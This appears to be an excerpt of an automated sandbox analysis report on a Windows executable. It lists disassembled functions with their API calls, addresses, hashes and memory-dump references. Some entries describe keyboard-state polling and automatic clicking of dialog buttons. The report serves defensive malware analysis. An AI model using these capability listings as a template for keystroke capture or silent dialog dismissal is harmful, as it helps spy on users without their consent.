                                                • Opcode Fuzzy Hash: 9dd2e9411d28357725c1876ec98fe2b101f95df8e6cdb6a6079386b94469d7b4
                                                • Instruction Fuzzy Hash: 6511D231904118AFCB20AB60EC4AEEA77BCDF12731F0441B6F44596291EF7C9A8286A5
                                                Function 007D501C Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • timeGetTime.WINMM ref: 007D5021
                                                  • Part of subcall function 0079034A: timeGetTime.WINMM(?,75C0B400,00780FDB), ref: 0079034E
                                                • Sleep.KERNEL32(0000000A), ref: 007D504D
                                                • EnumThreadWindows.USER32(?,Function_00064FCF,00000000), ref: 007D5071
                                                • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 007D5093
                                                • SetActiveWindow.USER32 ref: 007D50B2
                                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 007D50C0
                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 007D50DF
                                                • Sleep.KERNEL32(000000FA), ref: 007D50EA
                                                • IsWindow.USER32 ref: 007D50F6
                                                • EndDialog.USER32(00000000), ref: 007D5107
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                • String ID: BUTTON
                                                • API String ID: 1194449130-3405671355
                                                • Opcode ID: 0e286cc63606c9082bea9a95e12ddf19971dd4ee418e67504261008e725413ae
                                                • Instruction ID: 523dd01222f219ef6c6c16ac8103b74a396a4f677cd777a7d1a54940ace810e3
                                                • Opcode Fuzzy Hash: 0e286cc63606c9082bea9a95e12ddf19971dd4ee418e67504261008e725413ae
                                                • Instruction Fuzzy Hash: 77215070201608BFEB105B34EC89B363B79FB84346B149839F501923B1EE698D60C775
                                                Function 007DD619 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00779997: __itow.LIBCMT ref: 007799C2
                                                  • Part of subcall function 00779997: __swprintf.LIBCMT ref: 00779A0C
                                                • CoInitialize.OLE32(00000000), ref: 007DD676
                                                • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 007DD709
                                                • SHGetDesktopFolder.SHELL32(?), ref: 007DD71D
                                                • CoCreateInstance.OLE32(00802D7C,00000000,00000001,00828C1C,?), ref: 007DD769
                                                • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 007DD7D8
                                                • CoTaskMemFree.OLE32(?,?), ref: 007DD830
                                                • _memset.LIBCMT ref: 007DD86D
                                                • SHBrowseForFolderW.SHELL32(?), ref: 007DD8A9
                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 007DD8CC
                                                • CoTaskMemFree.OLE32(00000000), ref: 007DD8D3
                                                • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 007DD90A
                                                • CoUninitialize.OLE32(00000001,00000000), ref: 007DD90C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                • String ID:
                                                • API String ID: 1246142700-0
                                                • Opcode ID: c221bedfa4e274e47de412c340da48c2276392d63a6ae2f06b3512f77dc5317a
                                                • Instruction ID: c26272ce8b13119798b5c6bed16bd709e901e28a370efcf7364c73e27ef095d9
                                                • Opcode Fuzzy Hash: c221bedfa4e274e47de412c340da48c2276392d63a6ae2f06b3512f77dc5317a
                                                • Instruction Fuzzy Hash: 69B1EA75A00109EFDB14DFA4C888DAEBBB9FF88314B148469E909EB361DB34ED41CB50
                                                Function 007D034D Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetKeyboardState.USER32(?), ref: 007D03C8
                                                • SetKeyboardState.USER32(?), ref: 007D0433
                                                • GetAsyncKeyState.USER32(000000A0), ref: 007D0453
                                                • GetKeyState.USER32(000000A0), ref: 007D046A
                                                • GetAsyncKeyState.USER32(000000A1), ref: 007D0499
                                                • GetKeyState.USER32(000000A1), ref: 007D04AA
                                                • GetAsyncKeyState.USER32(00000011), ref: 007D04D6
                                                • GetKeyState.USER32(00000011), ref: 007D04E4
                                                • GetAsyncKeyState.USER32(00000012), ref: 007D050D
                                                • GetKeyState.USER32(00000012), ref: 007D051B
                                                • GetAsyncKeyState.USER32(0000005B), ref: 007D0544
                                                • GetKeyState.USER32(0000005B), ref: 007D0552
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: State$Async$Keyboard
                                                • String ID:
                                                • API String ID: 541375521-0
                                                • Opcode ID: f9029c82fbb16a0771f770f871ae0b25f3e76479631fbb8582f67147459a8185
                                                • Instruction ID: 94949c0495e37b81fdf6715bde9eb0b441b7723d1516d593806452124c6a30a9
                                                • Opcode Fuzzy Hash: f9029c82fbb16a0771f770f871ae0b25f3e76479631fbb8582f67147459a8185
                                                • Instruction Fuzzy Hash: 8A51892090478469EB35DBA49415BAEBFB49F02380F48959FD9C2563C2DA6C9B4CCBE1
                                                Function 007CC529 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDlgItem.USER32(?,00000001), ref: 007CC545
                                                • GetWindowRect.USER32(00000000,?), ref: 007CC557
                                                • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 007CC5B5
                                                • GetDlgItem.USER32(?,00000002), ref: 007CC5C0
                                                • GetWindowRect.USER32(00000000,?), ref: 007CC5D2
                                                • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 007CC626
                                                • GetDlgItem.USER32(?,000003E9), ref: 007CC634
                                                • GetWindowRect.USER32(00000000,?), ref: 007CC645
                                                • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 007CC688
                                                • GetDlgItem.USER32(?,000003EA), ref: 007CC696
                                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 007CC6B3
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 007CC6C0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Window$ItemMoveRect$Invalidate
                                                • String ID:
                                                • API String ID: 3096461208-0
                                                • Opcode ID: 7376b0f4f7f3fff963c53fa17b359d13cf790a125a2adbababe5441e83bb4eec
                                                • Instruction ID: 7bea25a7a7dfda05a59aa8324ce6a068cd7b4555911a1fae348d61c67890c296
                                                • Opcode Fuzzy Hash: 7376b0f4f7f3fff963c53fa17b359d13cf790a125a2adbababe5441e83bb4eec
                                                • Instruction Fuzzy Hash: F5512071B00205ABDB18CF69DD95FAEBBB5EF88710F14812DF519E6290DB74AD00CB54
                                                Function 0077201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00771B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00772036,?,00000000,?,?,?,?,007716CB,00000000,?), ref: 00771B9A
                                                • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 007720D3
                                                • KillTimer.USER32(-00000001,?,?,?,?,007716CB,00000000,?,?,00771AE2,?,?), ref: 0077216E
                                                • DestroyAcceleratorTable.USER32(00000000), ref: 007ABE26
                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007716CB,00000000,?,?,00771AE2,?,?), ref: 007ABE57
                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007716CB,00000000,?,?,00771AE2,?,?), ref: 007ABE6E
                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007716CB,00000000,?,?,00771AE2,?,?), ref: 007ABE8A
                                                • DeleteObject.GDI32(00000000), ref: 007ABE9C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                • String ID:
                                                • API String ID: 641708696-0
                                                • Opcode ID: f5f89fbe17f08586935c200f5ebc9c5cce6d3d1c1319f6665ef5410401e8f3ef
                                                • Instruction ID: d66a9de65873a6a6b63af8aeb437bbd26119e7d374ff0a116135111cf36309be
                                                • Opcode Fuzzy Hash: f5f89fbe17f08586935c200f5ebc9c5cce6d3d1c1319f6665ef5410401e8f3ef
                                                • Instruction Fuzzy Hash: B8617C31114A00DFCB359F14D948B2AB7F1FF81352F50C928E6568A972CB79A892DFA4
                                                Function 007721A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 007725DB: GetWindowLongW.USER32(?,000000EB), ref: 007725EC
                                                • GetSysColor.USER32(0000000F), ref: 007721D3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ColorLongWindow
                                                • String ID:
                                                • API String ID: 259745315-0
                                                • Opcode ID: fefc055d1cc311279ea2d4e2bd1eb679f34a6e90f35a46128e56bfffe191966f
                                                • Instruction ID: 58569f7d43c8230ea8f26316195d728d8f5dd69a572df73bd123bf62905f81ed
                                                • Opcode Fuzzy Hash: fefc055d1cc311279ea2d4e2bd1eb679f34a6e90f35a46128e56bfffe191966f
                                                • Instruction Fuzzy Hash: FA418D31100544EADF215F289C88BB93BA5FF46361F298365ED698A1E3CB398D42DB25
                                                Function 007DA931 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                Download Yara Rule
                                                APIs
                                                • CharLowerBuffW.USER32(?,?,007FF910), ref: 007DA995
                                                • GetDriveTypeW.KERNEL32(00000061,008289A0,00000061), ref: 007DAA5F
                                                • _wcscpy.LIBCMT ref: 007DAA89
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: BuffCharDriveLowerType_wcscpy
                                                • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                • API String ID: 2820617543-1000479233
                                                • Opcode ID: 682737b70241b342d2c404773827f2c06e3560e89658d678f32ea7c4e73a47a7
                                                • Instruction ID: 49c58186dad7f91a7803f4f639ac014bfd3a9070656d3ba5e297418a65f788f0
                                                • Opcode Fuzzy Hash: 682737b70241b342d2c404773827f2c06e3560e89658d678f32ea7c4e73a47a7
                                                • Instruction Fuzzy Hash: 2551CE31118301EFCB14EF14D895AAEB7B5FF85340F10892EF596973A2DB389949CA93
                                                Function 00779997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: __i64tow__itow__swprintf
                                                • String ID: %.15g$0x%p$False$True
                                                • API String ID: 421087845-2263619337
                                                • Opcode ID: 15f4789d0683700d519063e98bd260c380a219b98ccf3cf1534d1e4adfcb298e
                                                • Instruction ID: e6845cf6464b5b4aaea9f7b04b12b8365dd272ab261f4b833ce890e616f8249c
                                                • Opcode Fuzzy Hash: 15f4789d0683700d519063e98bd260c380a219b98ccf3cf1534d1e4adfcb298e
                                                • Instruction Fuzzy Hash: 7141F331515605EEEF24DB74D846E7A73E8EB85340F20896EE64DC7291EA39AD42CB10
                                                Function 007F7184 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • _memset.LIBCMT ref: 007F719C
                                                • CreateMenu.USER32 ref: 007F71B7
                                                • SetMenu.USER32(?,00000000), ref: 007F71C6
                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007F7253
                                                • IsMenu.USER32(?), ref: 007F7269
                                                • CreatePopupMenu.USER32 ref: 007F7273
                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007F72A0
                                                • DrawMenuBar.USER32 ref: 007F72A8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                • String ID: 0$F
                                                • API String ID: 176399719-3044882817
                                                • Opcode ID: 48255e7887bdaee260551eb6871a6aa58118faea281df082bc451bbcb3495b8a
                                                • Instruction ID: ad9ef2830e967b66294b946cc7f821be8fce428a0724e449b5947660e0dc4337
                                                • Opcode Fuzzy Hash: 48255e7887bdaee260551eb6871a6aa58118faea281df082bc451bbcb3495b8a
                                                • Instruction Fuzzy Hash: CB416C75A01209EFDB14DF68D884AAA7BF5FF49310F144529FE05A7360D734A920CFA4
                                                Function 007F74ED Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 007F7590
                                                • CreateCompatibleDC.GDI32(00000000), ref: 007F7597
                                                • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 007F75AA
                                                • SelectObject.GDI32(00000000,00000000), ref: 007F75B2
                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 007F75BD
                                                • DeleteDC.GDI32(00000000), ref: 007F75C6
                                                • GetWindowLongW.USER32(?,000000EC), ref: 007F75D0
                                                • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 007F75E4
                                                • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 007F75F0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                • String ID: static
                                                • API String ID: 2559357485-2160076837
                                                • Opcode ID: cf3368b477009b40c7a031f3b517684602748eb255856d9962de4fa6d666475a
                                                • Instruction ID: 60c983a911f01c64f2c84ae8ac16543f8ac78878b149d946876ffd07035a76c9
                                                • Opcode Fuzzy Hash: cf3368b477009b40c7a031f3b517684602748eb255856d9962de4fa6d666475a
                                                • Instruction Fuzzy Hash: 22316C72105119FBDF159F64DC08FFA3B69FF09320F114224FA15A62A0CB39E820DB68
                                                Function 00796F80 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                Download Yara Rule
                                                APIs
                                                • _memset.LIBCMT ref: 00796FBB
                                                  • Part of subcall function 00798CA8: __getptd_noexit.LIBCMT ref: 00798CA8
                                                • __gmtime64_s.LIBCMT ref: 00797054
                                                • __gmtime64_s.LIBCMT ref: 0079708A
                                                • __gmtime64_s.LIBCMT ref: 007970A7
                                                • __allrem.LIBCMT ref: 007970FD
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00797119
                                                • __allrem.LIBCMT ref: 00797130
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0079714E
                                                • __allrem.LIBCMT ref: 00797165
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00797183
                                                • __invoke_watson.LIBCMT ref: 007971F4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                • String ID:
                                                • API String ID: 384356119-0
                                                • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                • Instruction ID: cfe9e600a25c174403857ca23b1db65f2810d34b8f15d8f8bd9cf0c77f878a50
                                                • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                • Instruction Fuzzy Hash: 9D711871A4471AEBEF189F78EC46B5AB3A9AF81320F14433AF414D7281E778DA40C790
                                                Function 007D281F Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • _memset.LIBCMT ref: 007D283A
                                                • GetMenuItemInfoW.USER32(00835890,000000FF,00000000,00000030), ref: 007D289B
                                                • SetMenuItemInfoW.USER32(00835890,00000004,00000000,00000030), ref: 007D28D1
                                                • Sleep.KERNEL32(000001F4), ref: 007D28E3
                                                • GetMenuItemCount.USER32(?), ref: 007D2927
                                                • GetMenuItemID.USER32(?,00000000), ref: 007D2943
                                                • GetMenuItemID.USER32(?,-00000001), ref: 007D296D
                                                • GetMenuItemID.USER32(?,?), ref: 007D29B2
                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007D29F8
                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007D2A0C
                                                • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007D2A2D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                • String ID:
                                                • API String ID: 4176008265-0
                                                • Opcode ID: 16f1a9bbc2564e0624c3715119151fa1a89fd8253780d942edfaaf9ab847ee45
                                                • Instruction ID: 6d1c2e510c209469101a74ea90c5be56a895ae9786c1dab970971a36097d00d1
                                                • Opcode Fuzzy Hash: 16f1a9bbc2564e0624c3715119151fa1a89fd8253780d942edfaaf9ab847ee45
                                                • Instruction Fuzzy Hash: 4361A1B0904249AFDB21CF64DC889BE7BB9FF55304F14405AE842A7352DB39AD07DB20
                                                Function 007F6F55 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 007F6FD7
                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 007F6FDA
                                                • GetWindowLongW.USER32(?,000000F0), ref: 007F6FFE
                                                • _memset.LIBCMT ref: 007F700F
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 007F7021
                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 007F7099
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: MessageSend$LongWindow_memset
                                                • String ID:
                                                • API String ID: 830647256-0
                                                • Opcode ID: a1039c8f59c73b40afebc33c2e71b03ebf28f264beab7b674bc9795838b49f77
                                                • Instruction ID: d193586662fb6ac6dd25c8ef01f4c156c480ea23b97dece0999d19aa4a669f13
                                                • Opcode Fuzzy Hash: a1039c8f59c73b40afebc33c2e71b03ebf28f264beab7b674bc9795838b49f77
                                                • Instruction Fuzzy Hash: 17615975A00208AFDB10DFA4CC81EAE77F8EB49710F104169FA15AB3A1C778AD45DB60
                                                Function 007C6EEE Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 007C6F15
                                                • SafeArrayAllocData.OLEAUT32(?), ref: 007C6F6E
                                                • VariantInit.OLEAUT32(?), ref: 007C6F80
                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 007C6FA0
                                                • VariantCopy.OLEAUT32(?,?), ref: 007C6FF3
                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 007C7007
                                                • VariantClear.OLEAUT32(?), ref: 007C701C
                                                • SafeArrayDestroyData.OLEAUT32(?), ref: 007C7029
                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007C7032
                                                • VariantClear.OLEAUT32(?), ref: 007C7044
                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007C704F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
